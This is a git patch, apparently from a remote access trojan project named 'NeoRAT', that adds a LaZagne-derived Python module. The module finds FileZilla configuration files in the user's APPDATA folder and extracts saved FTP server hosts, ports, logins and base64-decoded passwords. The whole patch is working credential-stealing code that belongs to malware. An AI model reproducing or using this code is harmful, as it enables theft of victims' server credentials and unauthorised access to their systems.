From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/sysadmin/filezilla.py        | 53 ++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py

(limited to 'foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py')

diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py b/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py
new file mode 100644
index 0000000..fb6d929
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/filezilla.py
@@ -0,0 +1,53 @@
+# -*- coding: utf-8 -*-
+import base64
+
+from xml.etree.cElementTree import ElementTree
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+import os
+
+
+class Filezilla(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'filezilla', 'sysadmin')
+
+    def run(self):
+        path = os.path.join(constant.profile['APPDATA'], u'FileZilla')
+        if os.path.exists(path):
+            pwd_found = []
+            for file in [u'sitemanager.xml', u'recentservers.xml', u'filezilla.xml']:
+
+                xml_file = os.path.join(path, file)
+                if os.path.exists(xml_file):
+                    tree = ElementTree(file=xml_file)
+                    if tree.findall('Servers/Server'):
+                        servers = tree.findall('Servers/Server')
+                    else:
+                        servers = tree.findall('RecentServers/Server')
+
+                    for server in servers:
+                        host = server.find('Host')
+                        port = server.find('Port')
+                        login = server.find('User')
+                        password = server.find('Pass')
+                        
+                        # if all((host, port, login)) does not work
+                        if host is not None and port is not None and login is not None:
+                            values = {
+                                'Host': host.text,
+                                'Port': port.text,
+                                'Login': login.text,
+                            }
+
+                        if password is not None:
+                            if 'encoding' in password.attrib and password.attrib['encoding'] == 'base64':
+                                values['Password'] = base64.b64decode(password.text)
+                            else:
+                                values['Password'] = password.text
+
+                        if values: 
+                            pwd_found.append(values)
+
+            return pwd_found
-- 
cgit v1.2.3